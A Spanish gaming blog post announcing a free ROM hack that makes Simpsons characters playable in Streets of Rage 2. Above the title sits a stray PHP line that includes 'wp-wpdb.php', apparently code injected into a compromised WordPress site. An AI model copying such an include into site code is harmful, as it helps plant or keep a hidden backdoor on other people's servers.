if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Los Simpson en Streets of Rage 2 – La Fortaleza de LeChuck

Los Simpson en Streets of Rage 2

¿Cuántos episodios lleva la serie de Los Simpson ya? Seguramente un porrón, y hasta tuvo varios videojuegos. Ahora, gracias a un hack, aparecen jugables en el icónico videojuego Streets of Rage 2.

streets-of-rage-2-los-simpson

A lo mejor estás harto de pasarte Streets of Rage 2 (aunque eso suene imposible) con los mismos personajes, así que… ¿Por qué no le damos un aire fresco con la familia Simpson y amigos? En este hack del popular juego de Sega puedes jugar con varios personajes de la serie que luchan con su propio estilo. Puedes elegir a Homer, Marge, Lisa y Bart Simpson, además del Sr. Burns y Smithers, para así dejar el barrio bien limpio de macarras. Este es un hack de Candra Software que ha sido publicado de forma gratuita en la web romhacking y también está disponible en Steam.

Echa un vistazo a este video para ver los míticos personajes en movimiento y no dudes en descargarlo:

 

 

Por Arashi

Aparte de patear traseros de piratas como gobernadora en Mêlée, soy una fanática de los videojuegos desde que de pequeña me regalaron la Atari 2600. Adoro las aventuras gráficas y los RPG, pero no le hago ascos al resto. Otra de mis pasiones es todo lo relacionado con Japón.

Dejar un comentario